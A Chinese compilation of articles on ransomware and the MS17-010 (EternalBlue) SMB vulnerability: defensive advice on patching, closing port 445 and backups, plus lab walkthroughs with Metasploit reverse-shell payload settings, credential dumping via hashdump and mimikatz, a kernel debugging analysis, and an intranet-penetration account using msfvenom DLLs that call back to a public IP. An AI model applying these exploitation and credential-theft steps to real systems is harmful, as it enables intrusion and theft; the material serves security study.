本文目录一览:
- 1、勒索病毒怎么解决
- 2、ms17010漏洞的简单利用
- 3、MS17-010远程溢出漏洞(CVE-2017-0143)
- 4、[工具编写][漏洞研究]MS17-010分析-上
- 5、勒索病毒是什么
- 6、内网渗透之ms17-010
勒索病毒怎么解决
问题一:中了勒索病毒怎么办呢? 1,直接重装系统,不过电脑文件全都没了
2,另外就是安装电脑管家,打开工具箱
3,有一个文件解密,尝试用这个是否可以正常打开文件
4,还不行的话就在安全模式下杀毒,看能不能彻底删除该病毒
问题二:勒索病毒现在有解决的办法了吗? 360安全卫士已经推出了资料恢复工具!安装下载即可!
具体下载地址到360官网!
问题三:中了勒索软件病毒,可以处理吗 可安全模式下查杀
1、病毒大多隐藏在C盘的SYSTEM32文件夹内,这是装载系统的文件夹,不过木马病毒都具有隐藏性,想自己找是不行的。
2、如果电脑中毒了,可下载一个腾讯电脑管家查杀。
3、然后使用腾讯电脑管家――杀毒――全盘查杀,电脑管家拥有4+1杀毒引擎,基于“云查杀与微特征技术”的新一代电脑管家云查杀引擎和本地反病毒引擎,可以轻松根据微特征和云病毒库,检测出各种流行顽固木马病毒,并做出查杀。
问题四:我电脑中了勒索病毒怎么办? 中了那就没办法了,等Key 被破解或者交钱吧,可以告诉你怎么防范
勒索病毒导致人心惶惶,医院,加油站,学校,公安系统相继中招,而且中招的不是核心服务器,都是终端设备,看来人们的安全目标也还转移下了,不加油可以接受,手术都能取消就太戏剧性了,也好,国人可以提高安全意识了。首先杀毒软件可以有效的防护,但是像国外发达国家杀毒软件不是很强,还不照样中招?备份才是数据安全的最后一道防线,还要是离线备份,传统的可以整个百度云,备份下文件,系统被破坏在重新捣腾一次,起码损失减少了,但是个人建议可以采用像ghost或者更强的trueimage进行镜像级的保护,当然数据备份到哪里也很讲究,备份到本地照样被加密,trueimage有安全区的概念,就是在本地磁盘上创建另外一个专有格式的文件系统,任何病毒都访问不了,而用户可以进行数据备份和恢复,方便快捷还安全,终端设备首选。
亲自测试了一遍效果不错,安全区里的备份文件没有被加密
问题五:电脑中勒索病毒了怎么办? 1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快安装此安全补丁,网址为:technet.microsoft/zh-/library/security/MS17-010;对于windows XP、2003等微软已不再提供安全更新的机器,可使用360“NSA武器库免疫工具”检测系统是否存在漏洞,并关闭受到漏洞影响的端口,可以避免遭到勒索软件等病毒的侵害。免疫工具下载地址:dl.360safe/nsa/nsatool.exe。
2、关闭445、135、137、138、139端口,关闭网络共享。
3、强化网络安全意识:不明链接不要点击,不明文件不要下载,不明邮件不要打开……
4、尽快(今后定期)备份自己电脑中的重要文件资料到移动硬盘、U盘,备份完后脱机保存该磁盘。
5、建议仍在使用windows xp, windows 2003操作系统的用户尽快升级到 window 7/windows 10,或 windows 2008/2012/2016操作系统。
注意:
切勿支付赎金,个人用户可联系360安全中心,360安全专家可协助处理。
若电脑内无有价数据可通过格式化硬盘恢复。
问题六:中了勒索病毒能不能解决 Windows用户不幸遭受wanacry勒索病毒攻击目前解决办法如下:(无论如何切勿支付赎金,有大量证据表明即使支付赎金文件也无法解密。)Windows用户可以通过格式化所有硬盘从而彻底在设备上消除wanacry勒索病毒。
个人用户可以联系国内外安全厂商例如:奇虎360,金山毒霸,卡巴斯基,麦克菲尔,腾讯安全管家等安全中心寻求协助恢复重要数据。
利用“勒索病毒免疫工具”进行修复。用户通过其他电脑下载腾讯电脑管家“勒索病毒免疫工具”离线版,并将文件拷贝至安全、无毒的U盘;再将指定电脑在关闭WiFi,拔掉网线,断网状态下开机,并尽快备份重要文件;然后通过U盘使用“勒索病毒免疫工具”离线版,进行一键修复漏洞;联网即可正常使用电脑。
利用“文件恢复工具”进行恢复。已经中了病毒的用户,可以使用电脑管家-文件恢复工具进行文件恢复,有一定概率恢复您的文档。
注意:也可持续关注相关安全厂商的处理办法,等待更加优越的完美解锁。
问题七:防止中勒索病毒应该怎么做? 30分 下个360
或者看看微博上有教你怎么防止端口病毒的视频
问题八:中了勒索病毒怎么解决 Windows用户可以通过格式化所有硬盘从而彻底在设备上消除wanacry勒索病毒。
个人用户可以联系国内外安全厂商例如:奇虎360,金山毒霸,卡巴斯基,麦克菲尔,腾讯安全管家等安全中心寻求协助恢复重要数据。
利用“勒索病毒免疫工具”进行修复。用户通过其他电脑下载腾讯电脑管家“勒索病毒免疫工具”离线版,并将文件拷贝至安全、无毒的U盘;再将指定电脑在关闭WiFi,拔掉网线,断网状态下开机,并尽快备份重要文件;然后通过U盘使用“勒索病毒免疫工具”离线版,进行一键修复漏洞;联网即可正常使用电脑。
利用“文件恢复工具”进行恢复。已经中了病毒的用户,可以使用电脑管家-文件恢复工具进行文件恢复,有一定概率恢复您的文档。
注意:也可持续关注相关安全厂商的处理办法,等待更加优越的完美解锁。
问题九:新一轮勒索病毒petya爆发是怎么回事? 在6月27日晚间(欧洲6月27日下午时分),新一轮的勒索病毒变种(本次名为Petya)又再一次袭击并导致欧洲多国多个组织、多家企业的系统出现瘫痪,距今年5月感染全球150多个国家的Wannacry勒索病毒事件仅一个多月。
与5月爆发的Wannacry相比,Petya勒索病毒变种的传播速度更快。它不仅使用了NSA“永恒之蓝”等黑客武器攻击系统漏洞,还会利用“管理员共享”功能在内网自动渗透。在欧洲国家重灾区,新病毒变种的传播速度达到每10分钟感染5000余台电脑,多家运营商、石油公司、零售商、机场、银行ATM机等企业和公共设施已大量沦陷,甚至乌克兰副总理的电脑也遭到感染。
目前,乌克兰似乎是“Petya”受打击最严重的国家之一。 该国 *** 、一些国内银行和能源公司今天都发出了警报,他们正在处理来自Petya感染的后果。
此次攻击是勒索病毒‘必加’(Petya)的新变种,该变种疑似采用了邮件、下载器和蠕虫的组合传播方式,之后通过MS17-010(永恒之蓝)漏洞和系统弱口令进行内网传播。
同时,经过初步分析发现,Petya捆绑了一个名为“LSADump”的工具,可以从Windows计算机和网络上的域控制器收集密码和凭证数据。
因此,Petya勒索病毒对内网总体上比此前受到广泛关注的“魔窟”(WannaCry)有更大的威胁,而多种传播手段组合的模式必将成为勒索软件传播的常态模式。
Petya勒索病毒最早出现在2016年初,以前主要利用电子邮件传播。最新爆发的类似Petya的病毒变种则具备了全自动化的攻击能力,即使电脑打齐补丁,也可能被内网其他机器渗透感染。
新变异病毒(Petya)不仅只对文件进行加密,而且直接将整个硬盘加密、锁死,在出现以下界面并瘫痪后,其同时自动向局域网内部的其它服务器及终端进行传播。
Petya要求受害者通过Tor网络支付300美金赎金来解锁相关被加密文件,但是目前大量证据表明即使支付赎金也无法进行解密文件。
勒索病毒在西方已经非常流行,已经形成黑色产业链,大量邮件中夹杂勒索软件,目前没有明显证据证明该次勒索病毒对欧洲国家产生太大的经济影响,但是值得警惕,一旦后面出现大规模爆发可能会产生更大影响。
目前我国已经有极少数单位出现被Petya感染的情况。
勒索软件的解密是非常困难的,如果文件被加密,暂时还没有非常有效的解决办法,因此我们要注重加强防范。
随着勒索软件被越来越多人熟知,可能会有更大一部分用户考虑备份数据。
问题十:勒索病毒感染了怎么办 1,可以装个电脑管家在你电脑上
2,然后打开工具箱,找到勒索病毒专杀工具
3,把这个病毒查杀了,自然就可以恢复了
ms17010漏洞的简单利用
(第一次在发表文章,没啥经验,分享一些学习经验。大佬们多多包涵,也希望大家能够指出我的错误。)
靶机:windows7 x64 IP:192.168.1.5
攻击机:Kali Rolling (2019.3) x64 IP:192.168.1.3
两台主机在同一网段内;win7关闭防火墙并且开启445端口。
1、使用ipconfig/ifconfig分别查看win7和kali的ip。
2、打开msf工具
每次开启都会有不同的界面
3、使用search命令搜索ms17_010
4、选择模块和设置条件
使用use来选择第三个模块,可以直接 use 2,也可以打全
然后用set来设置靶机IP set rhost 192.168.1.5
设置本机IP set lhost 192.168.1.3
设置监听端口 set lport 8888 不设置则默认4444端口
设置payload set payload windows/x64/meterpreter/reverse_tcp
还有另外一个payload能用于本实验,具体可以 show payloads 查看
最后,可以使用show options检查所有信息
5、开始渗透 run
稍等片刻 看到win则成功创建会话
6、成功之后,可以开启Windows7的摄像头,截图等等
具体可以用help查看
1、关闭445端口
2、打开防火墙,安装安全软件
3、安装对应补丁,这里就不放链接了
关闭445端口的方法:
1)打开控制面板----Windows防火墙----高级设置
2)点击新建规则,设置端口号的规则并且命名(如图)
msf工具虽然强大,但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。
MS17-010远程溢出漏洞(CVE-2017-0143)
Nmap :端口扫描探测工具,用于探测端口开放情况,本次使用其端口扫描和漏洞扫描功能
mestasploit :开源的渗透测试框架软件、综合型漏洞利用工具,本次实验使用其漏洞利用模块、meterpreter组件
漏洞原理简述
MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理 FEA (File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数 srv!SrvOs2FeaListToNt 在将 FEA list转换成 NTFEA (Windows NT FEA) list前会调用 srv!SrvOs2FeaListSizeToNt 去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
曾经NSA工具箱泄露时,我们已经对永恒之蓝这个工具的使用做过讲解! 【NSA黑客工具包】Windows 0day验证实验 。
然而,该工具的使用环境比较苛刻,而且操作较为复杂,现在msf已经加入该系列工具,使用方法更便捷。接下来,就开始操作吧!
打开Kali终端,使用Nmap对目标机开放端口进行扫描
目标机开放了 135 139 445 3389 等端口,且目标机系统为Windows7,
我们使用用扫描模块,判断该漏洞是否可利用
终端内输入
打开 metasploite 命令行客户端,使用 search 命令查找ms17-010漏洞的相关模块
如下是相关可用模块
使用 use 命令选择我们要使用的扫描模块
在运行该模块之前,需要设置相关选项,我们使用 show options 查看配置信息
需要设置目标地址,设置命令:
设置完成后,执行 run 或 exploit 命令,等待执行结果
从上一步骤可以看出,该漏洞是可被利用的,接下来,我们祭出漏洞利用模块
步骤同上,查看配置信息,并设置标记为yes的属性
show options
目标机host地址:172.16.12.2
set RHOST 172.16.12.2
之后,选择载荷 payload ,也就是 shellcode ,此处我们选择回连至控制端 shell 的 payload
同样,载荷也需要进行配置, show options 查看配置信息
配置中缺少本地主机 RHOST,设置一下
完成配置后,运行 exploit 或者 run ,开始执行漏洞利用模块
成功获取来自目标主机的Session会话
我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能
运行 sysinfo 查看目标机器相关信息
执行 help 命令可以帮助我们了解meterpreter有哪些功能
接下来,我们获取目标机hash值
执行 hashdump
mimikatz 是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等, meterpreter 中正集成了这款工具。
执行 load mimikatz 即可加载该工具,其命令与 mimikatz 一样
运行命令 msv ,导出hash
然后执行 kerberos 即可获得目标机账号密码
获取了目标机的账号密码,我们结合nmap的扫描结果,可以远程登陆目标机 但是现实中,防火墙一般会拦截外来3389端口的访问请求,这种情况下该怎么解决呢?
我们可以使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接
运行命令
此处,我们将远程目标的3389端口,转发到本机 172.16.11.2的3389上
如此,我们只要执行
即可登陆远程目标机器
通过本次实验,我们熟悉了从发现漏洞、到验证漏洞、再到利用漏洞这一过程,并进一步学习了Metasploit的后渗透模块的其他使用案例。
通过结合实例去学习MSF的使用,反复训练,相信大家一定能熟能生巧,彻底掌握这一工具。
[工具编写][漏洞研究]MS17-010分析-上
win7 sp1 32bits srv.sys 6.1.7601.17514
srvnet.sys 6.1.7601.17514
PS:这两个文件在 C:\Windows\System32\drivers 下
windbg双机调试
该漏洞主要是利用smb1在处理一个结构体转换过程中,错误计算了大小,导致的溢出。Nasa的工具集的EternalBlue利用这个溢出,对后面相连的一个内存池做了覆盖,并利用堆喷射的技巧,精准覆盖了0xffdff000的可执行内存,这个内存本来是系统预留用于存储一些配置信息的(Win7x86中是这个地址,Win7x64中是0xffffffffffd00010),最终在srvnet!SrvNetWskReceiveComplete这个函数中触发了shellcode。
溢出漏洞的函数链 :
srv!SrvSmbOpen2 - srv!SrvOs2FeaListToNt - srv!SrvOs2FeaListSizeToNt - srv!SrvOs2FeaToNt
3.下以下几个断点
bu srv!SrvOs2FeaListSizeToNt 内存长度计算出错的函数
bu srv!SrvOs2FeaToNt 内存实际溢出的函数
bu srv!SrvOs2FeaListToNt 上层函数
bu srv!SrvSmbOpen2 接收数据的地方
10. SrvOs2FeaListSizeToNt 的函数分析如下图
关键点在于 mov word ptr [eax], si 这个汇编语句,仅赋值了低位数据 :
11.下个断点,看一下poc的结构体分布。
本来后面想研究一下它怎么实现的堆布局,以及覆盖这部分内存是什么结构体,以及shellcode写入的包是在哪个部分的,发现自个有点搞不动了,看几天书回忆回忆再来弄。
之前分析wanacry的时候感觉挺简单的,内核分析感觉像是在盲人摸象,每一次观察都能有新的东西,但是又始终无法有一个完整清晰的轮廓。
一份好心人的windows源码
一份可以让你在三环弄明白大致原理的分析文章
一份隐藏了利用细节,但是展现详细调试细节的文章
勒索病毒是什么
勒索病毒,该恶意软件会扫描电脑上的TCP 445端口(Server Message Block/SMB),以类似于蠕虫病毒的方式传播,攻击主机并加密主机上存储的文件,然后要求以比特币的形式支付赎金。勒索金额为300至600美元。那么勒索病毒是什么呢?以下是我帮大家整理的关于勒索病毒是什么,供大家参考借鉴,希望可以帮助到有需要的`朋友。
勒索病毒是什么
勒索软件利用此前披露的Windows SMB服务漏洞(对应微软漏洞公告:MS17—010)攻击手段,向终端用户进行渗透传播,并向用户勒索比特币或其他价值物。
01综合CNCERT和国内网络安全企业已获知的样本情况和分析结果,该勒索软件在传播时基于445端口并利用SMB服务漏洞(MS17—010),总体可以判断是由于此前“Shadow Brokers”披露漏洞攻击工具而导致的后续黑产攻击威胁。
02当用户主机系统被该勒索软件入侵后,弹出如下勒索对话框,提示勒索目的并向用户索要比特币。而对于用户主机上的重要文件,如:照片、图片、文档、压缩包、音频、视频、可执行程序等几乎所有类型的文件,都被加密的文件后缀名被统一修改为“。WNCRY”。
03目前安全业界暂未能有效破除该勒索软的恶意加密行为,用户主机一旦被勒索软件渗透,只能通过重装操作系统的方式来解除勒索行为,但用户重要数据文件不能直接恢复。
应急处置
01及时升级Windows操作系统,及时更新Windows已发布的安全补丁,目前微软公司已发布相关补丁程序MS17—010,可通过微软公司正规渠道进行升级。
02及时关闭计算机、网络设备上的445端口。关闭445等端口(其他关联端口如:135、137、139)的外部网络访问权限,在服务器上关闭不必要的上述服务端口。
03关闭445端口
开始—运行输入regedit。确定后定位到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters,新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为0,则可关闭445端口。
04在Windows电脑上运行系统自带的免费杀毒软件并启用Windows Updates的用户可以免受这次病毒的攻击。Windows 10的用户可以通过设置—Windows更新启用Windows Updates安装最新的更新,同时可以通过设置—Windows Defender,打开安全中心。
05做好信息系统业务和个人数据的备份。
06已感染病毒机器请立即断网,避免进一步传播感染。
内网渗透之ms17-010
在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010
在msf成功接收session之后,添加路由
然后使用ms17-010相关的模块进行探测是否存在该漏洞。
尝试利用
LHOST配置为公网IP
可以看到success。漏洞是可以利用的,但始终没有session。不知道什么原因。
参考资料: 利用公网Msf+MS17010跨网段攻击内网
笔者在本地搭建环境,也是同样的结果。尝试更改payload为
bind_tcp攻击者去连接,容易被防火墙和杀毒发现
可以成功生成session,但并不稳定,且在run的过程中非常容易导致本来的session died
在实际使用msf的ms17_010_eternalblue模块时,笔者观察到有几个弊端。
1.session 很容易died
2.ms17_010_eternalblue模块利用起来非常耗时
3.无法利用成功
有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。
所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。
参考资料: 萌新初试MS17-010方程式漏洞
工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候,调用x64.dll动态链接库,反弹到公网IP。原理和fb.py一样。
笔者通过ew代理进内网后,在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合,威力巨大。成功利用ms17-010
对于windows server 2008 ,msfvenom生成x64.dll文件
msf配置
将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP,就可以获取session。
对于windows server 2003 ,msfvenom生成x86.dll文件
msf配置
进一步利用的一些命令
实际测试发现这种session非常稳定。不会轻易go die
实际测试server 2003的ms17-010时,有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏。
所以笔者选择一种稳定可靠一些的办法。
先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]
参考资料 Metasploit 「永恒之蓝」两种模块的利弊
system的权限可以直接激活guest用户添加管理员组。
注意:使用ms17_010_psexec需要指定管理员的用户名、密码,否则没有session
同样的操作,载入mimikatz,读取管理员密码。